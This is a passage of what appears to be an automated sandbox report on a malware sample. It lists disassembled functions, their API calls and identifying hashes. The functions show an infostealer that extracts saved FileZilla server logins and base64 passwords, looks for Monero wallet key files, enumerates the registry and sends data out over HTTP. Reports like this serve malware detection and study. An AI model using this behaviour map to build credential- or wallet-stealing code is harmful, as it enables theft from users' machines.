                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d8a7689b95a829120af565880130cb6311bbb84eb1e8b88b5ff474173398cfe
                                  • Instruction ID: 5be07caf373bf3f827b4faca7601d737d0b8c60be45c3713292e1296f90350e4
                                  • Opcode Fuzzy Hash: 4d8a7689b95a829120af565880130cb6311bbb84eb1e8b88b5ff474173398cfe
                                  • Instruction Fuzzy Hash: 5941B4F39086149FE714AE19DC8176AF7E5EF84720F16492DEAC887340EA7598008BD7
                                  Function 00729750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00720250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00730DBA,00730DB7,00730DB6,00730DB3), ref: 00720362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00720369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00720385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 007203CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 007203DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00720419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00720463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 00720532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00720562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00720571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00720580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00720593
                                  • lstrcat.KERNEL32(?,00731678), ref: 007205A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 007205B5
                                  • lstrcat.KERNEL32(?,0073167C), ref: 007205C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 007205D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 007205E6
                                  • lstrcat.KERNEL32(?,00731688), ref: 007205F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00720604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00720617
                                  • lstrcat.KERNEL32(?,00731698), ref: 00720626
                                  • lstrcat.KERNEL32(?,0073169C), ref: 00720635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00730DB2), ref: 0072068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: a7eb8c265139884f221fcf36834ad53756c1f191dbe399922e29c658a9363ae1
                                  • Instruction ID: 476361d4ba23ede9bd269f4d206fc875c425edf142cae5c0c0f8a9d31badaff4
                                  • Opcode Fuzzy Hash: a7eb8c265139884f221fcf36834ad53756c1f191dbe399922e29c658a9363ae1
                                  • Instruction Fuzzy Hash: 9FD13371D10218EBDB04EBF4ED9ADEE7778EF18301F408518F102A6192DF79AA05DB66
                                  Function 00715960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007159F8
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00715A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00715B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0122F628,00000000,?,0122AE60,00000000,?,00731A1C), ref: 00715E71
                                  • lstrlen.KERNEL32(00000000), ref: 00715E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00715E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00715E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00715EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00715ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00715EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00715F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00715F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00715F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FBD
                                  • HttpOpenRequestA.WININET(00000000,0122F668,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00715BF8
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00715FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 624cbe0b91215c9f4010ef9c113f8a0a37d863e86020245aa09cfb6733bf931e
                                  • Instruction ID: 4fc26e3b7d1c39a278243901c871472b30276d59268536c1baf63681c13476c6
                                  • Opcode Fuzzy Hash: 624cbe0b91215c9f4010ef9c113f8a0a37d863e86020245aa09cfb6733bf931e
                                  • Instruction Fuzzy Hash: 1F12C071920128FBDB15EBA0EC99FEEB378BF54700F5041A9F10662092DF786A49CF65
                                  Function 0071CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0071D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D208
                                  • lstrcat.KERNEL32(?,00731478), ref: 0071D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D22A
                                  • lstrcat.KERNEL32(?,0073147C), ref: 0071D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D24C
                                  • lstrcat.KERNEL32(?,00731480), ref: 0071D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D26E
                                  • lstrcat.KERNEL32(?,00731484), ref: 0071D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D290
                                  • lstrcat.KERNEL32(?,00731488), ref: 0071D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D2B2
                                  • lstrcat.KERNEL32(?,0073148C), ref: 0071D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071D2D4
                                  • lstrcat.KERNEL32(?,00731490), ref: 0071D2E3
                                    • Part of subcall function 0072A820: lstrlen.KERNEL32(00714F05,?,?,00714F05,00730DDE), ref: 0072A82B
                                    • Part of subcall function 0072A820: lstrcpy.KERNEL32(00730DDE,00000000), ref: 0072A885
                                  • lstrlen.KERNEL32(?), ref: 0071D32A
                                  • lstrlen.KERNEL32(?), ref: 0071D339
                                    • Part of subcall function 0072AA70: StrCmpCA.SHLWAPI(01229B50,0071A7A7,?,0071A7A7,01229B50), ref: 0072AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: b93f62ce479b378d63b6f038834865d44cc4f84640b1c468f75fa6f3a0666044
                                  • Instruction ID: 8ef2aa2109226b3879d66b8f313d41a30f70bae0cb88e10958788ee4a50ba65c
                                  • Opcode Fuzzy Hash: b93f62ce479b378d63b6f038834865d44cc4f84640b1c468f75fa6f3a0666044
                                  • Instruction Fuzzy Hash: EBE12E71910218FBDB05EBA0ED9AEEE7378BF14301F504168F107A6092DE39AE45DB66
                                  Function 0071C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0122E108,00000000,?,0073144C,00000000,?,?), ref: 0071CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0071CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0071CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0071CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0071CAD9
                                  • StrStrA.SHLWAPI(?,0122E168,00730B52), ref: 0071CAF7
                                  • StrStrA.SHLWAPI(00000000,0122E120), ref: 0071CB1E
                                  • StrStrA.SHLWAPI(?,0122E5E0,00000000,?,00731458,00000000,?,00000000,00000000,?,01229A90,00000000,?,00731454,00000000,?), ref: 0071CCA2
                                  • StrStrA.SHLWAPI(00000000,0122E800), ref: 0071CCB9
                                    • Part of subcall function 0071C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0071C871
                                    • Part of subcall function 0071C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0071C87C
                                  • StrStrA.SHLWAPI(?,0122E800,00000000,?,0073145C,00000000,?,00000000,01229AA0), ref: 0071CD5A
                                  • StrStrA.SHLWAPI(00000000,01229DC0), ref: 0071CD71
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B46), ref: 0071C943
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B47), ref: 0071C957
                                    • Part of subcall function 0071C820: lstrcat.KERNEL32(?,00730B4E), ref: 0071C978
                                  • lstrlen.KERNEL32(00000000), ref: 0071CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0071CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: da191e64bf8f452e458f2a9b589073baccb479c47735bdabec8cca2e4be53aad
                                  • Instruction ID: 92c5cf2ccb43bcb62c628a5a777ec4afd58a5b14355c2d9668cc1fd7c8c5384c
                                  • Opcode Fuzzy Hash: da191e64bf8f452e458f2a9b589073baccb479c47735bdabec8cca2e4be53aad
                                  • Instruction Fuzzy Hash: ECE1EF71D10118FBDB15EBA4EC9AFEEB778AF18300F404169F10667192DF386A4ACB65
                                  Function 00728320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0122BFC8,00000000,00020019,00000000,007305B6), ref: 007283A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00728426
                                  • wsprintfA.USER32 ref: 00728459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0072847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728499
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 3801f3b990ce2c7e5ffb91d055fa8ee009e32af7e6ecf29f525baac7c8bdd254
                                  • Instruction ID: 9e1e4f9c8d990b210fa8ce6d7fe3426dd1b2967331bb7182ed425e1fd81d1bc3
                                  • Opcode Fuzzy Hash: 3801f3b990ce2c7e5ffb91d055fa8ee009e32af7e6ecf29f525baac7c8bdd254
                                  • Instruction Fuzzy Hash: D8811DB1911228EBEB24DB50DC95FEAB7B8FF08700F0082D8E109A6141DF796B85CF95
